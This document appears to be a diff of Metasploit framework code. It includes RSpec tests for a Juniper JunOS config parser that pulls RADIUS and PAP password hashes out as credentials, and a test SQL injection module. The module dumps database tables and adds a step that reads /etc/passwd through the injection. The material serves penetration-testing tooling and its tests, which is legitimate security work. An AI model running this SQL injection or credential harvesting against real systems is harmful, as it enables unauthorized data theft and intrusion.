+    context 'deals radius-server blocks' do
+      it 'with one credential' do
+        expect(aux_juniper).to receive(:print_good).with('radius server 1.1.1.1 password hash: $9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV')
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+        expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
+                                                         "access {\n              radius-server {\n                  1.1.1.1 secret \"$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV\"; ## SECRET-DATA\n              }\n           }",
+                                                         'config.txt', 'Juniper JunOS Configuration')
+        expect(aux_juniper).to receive(:create_credential_and_login).with(
+          {
+            address: '1.1.1.1',
+            port: 1812,
+            protocol: 'udp',
+            workspace_id: workspace.id,
+            origin_type: :service,
+            service_name: 'radius',
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            private_data: '$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV',
+            private_type: :nonreplayable_hash,
+            status: Metasploit::Model::Login::Status::UNTRIED
+          }
+        )
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(access {
               radius-server {
                   1.1.1.1 secret "$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV"; ## SECRET-DATA
               }
            }
-        )
-      )
-    end
+        ))
+      end
 
+      it 'with two credentials' do
+        expect(aux_juniper).to receive(:print_good).with('radius server 2.2.2.2 password hash: $9$Y-11ikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKv111')
+        expect(aux_juniper).to receive(:print_good).with('radius server 1.1.1.1 password hash: $9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV')
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+        expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
+                                                         "access {\n              radius-server {\n                  1.1.1.1 secret \"$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV\"; ## SECRET-DATA\n                  2.2.2.2 secret \"$9$Y-11ikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKv111\"; ## SECRET-DATA\n              }\n           }",
+                                                         'config.txt', 'Juniper JunOS Configuration')
+        expect(aux_juniper).to receive(:create_credential_and_login).with(
+          {
+            address: '1.1.1.1',
+            port: 1812,
+            protocol: 'udp',
+            workspace_id: workspace.id,
+            origin_type: :service,
+            service_name: 'radius',
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            private_data: '$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV',
+            private_type: :nonreplayable_hash,
+            status: Metasploit::Model::Login::Status::UNTRIED
+          }
+        )
+        expect(aux_juniper).to receive(:create_credential_and_login).with(
+          {
+            address: '2.2.2.2',
+            port: 1812,
+            protocol: 'udp',
+            workspace_id: workspace.id,
+            origin_type: :service,
+            service_name: 'radius',
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            private_data: '$9$Y-11ikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKv111',
+            private_type: :nonreplayable_hash,
+            status: Metasploit::Model::Login::Status::UNTRIED
+          }
+        )
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(access {
+              radius-server {
+                  1.1.1.1 secret "$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV"; ## SECRET-DATA
+                  2.2.2.2 secret "$9$Y-11ikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKv111"; ## SECRET-DATA
+              }
+           }
+        ))
+      end
+    end
     it 'deals with pap' do
       expect(aux_juniper).to receive(:print_good).with('PPTP username \'pap_username\' hash $9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR via PAP')
-      expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
-      expect(aux_juniper).to receive(:store_loot).with("juniper.junos.config", "text/plain", "127.0.0.1",
-        "interfaces {\n               pp0 {\n                   unit 0 {\n                       ppp-options {\n                           pap {\n                               local-name \"'pap_username'\";\n                               local-password \"$9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR\"; ## SECRET-DATA\n                           }\n                      }\n                  }\n               }\n           }",
-        "config.txt", "Juniper JunOS Configuration"
-      )
-      #expect(aux_juniper).to receive(:store_loot).with(
+      expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+      expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
+                                                       "interfaces {\n               pp0 {\n                   unit 0 {\n                       ppp-options {\n                           pap {\n                               local-name \"'pap_username'\";\n                               local-password \"$9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR\"; ## SECRET-DATA\n                           }\n                      }\n                  }\n               }\n           }",
+                                                       'config.txt', 'Juniper JunOS Configuration')
+      # expect(aux_juniper).to receive(:store_loot).with(
       #  "cisco.ios.config", "text/plain", "127.0.0.1", "password 5 1511021F0725", "config.txt", "Cisco IOS Configuration"
-      #)
+      # )
       expect(aux_juniper).to receive(:create_credential_and_login).with(
         {
-          address: "127.0.0.1",
+          address: '127.0.0.1',
           port: 1723,
-          protocol: "tcp",
+          protocol: 'tcp',
           workspace_id: workspace.id,
           origin_type: :service,
           service_name: 'pptp',
-          module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-          private_data: "$9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR",
+          module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+          private_data: '$9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR',
           username: "'pap_username'",
           private_type: :nonreplayable_hash,
           status: Metasploit::Model::Login::Status::UNTRIED
         }
       )
-      aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
-        %q(interfaces {
+      aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                             %q(interfaces {
                pp0 {
                    unit 0 {
                        ppp-options {
@@ -600,11 +765,7 @@ RSpec.describe Msf::Auxiliary::Juniper do
                   }
                }
            }
-       )
-      )
+       ))
     end
-
   end
-
-
 end

test/modules/auxiliary/test/sqli_test.rb

@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def boolean_blind
-    encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
+    encoder = datastore['ENCODER'].nil? || datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
     sqli = create_sqli(dbms: @dbms, opts: {
       encoder: encoder,
       hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def reflected
-    encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
+    encoder = datastore['ENCODER'].nil? || datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
     truncation = datastore['TRUNCATION_LENGTH'] <= 0 ? nil : datastore['TRUNCATION_LENGTH']
     sqli = create_sqli(dbms: @dbms, opts: {
       encoder: encoder,
@@ -69,19 +69,26 @@ class MetasploitModule < Msf::Auxiliary
     }) do |payload|
       sock = TCPSocket.open(datastore['RHOST'], datastore['RPORT'])
       sock.puts('0 union ' + payload)
-      res = sock.gets&.chomp
+      res = ""
+      begin
+        while true
+          res += sock.readline
+        end
+      rescue EOFError
+        vprint_status("Hit end of file...")
+      end
       sock.close
       truncation ? res[0, truncation] : res
     end
-    unless sqli.test_vulnerable
-      print_bad("Doesn't seem to be vulnerable")
-      return
-    end
+    #unless sqli.test_vulnerable
+    #  print_bad("Doesn't seem to be vulnerable")
+    #  return
+    #end
     perform_sqli(sqli)
   end
 
   def time_blind
-    encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
+    encoder = datastore['ENCODER'].nil? || datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
     sqli = create_sqli(dbms: @dbms, opts: {
       encoder: encoder,
       hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
@@ -109,15 +116,19 @@ class MetasploitModule < Msf::Auxiliary
   def perform_sqli(sqli)
     print_good "dbms version: #{sqli.version}"
     tables = sqli.enum_table_names
+    tables.map! { |table| table.strip }
     print_good "tables: #{tables.join(', ')}"
     tables.each do |table|
       columns = sqli.enum_table_columns(table)
+      columns.map! { |column| column.strip }
       print_good "#{table}(#{columns.join(', ')})"
       content = sqli.dump_table_fields(table, columns)
       content.each do |row|
         print_good "\t" + row.join(', ')
       end
     end
+    passwd_content = sqli.read_from_file('/etc/passwd')
+    print_good("Got #{passwd_content}")
   end
 
   def run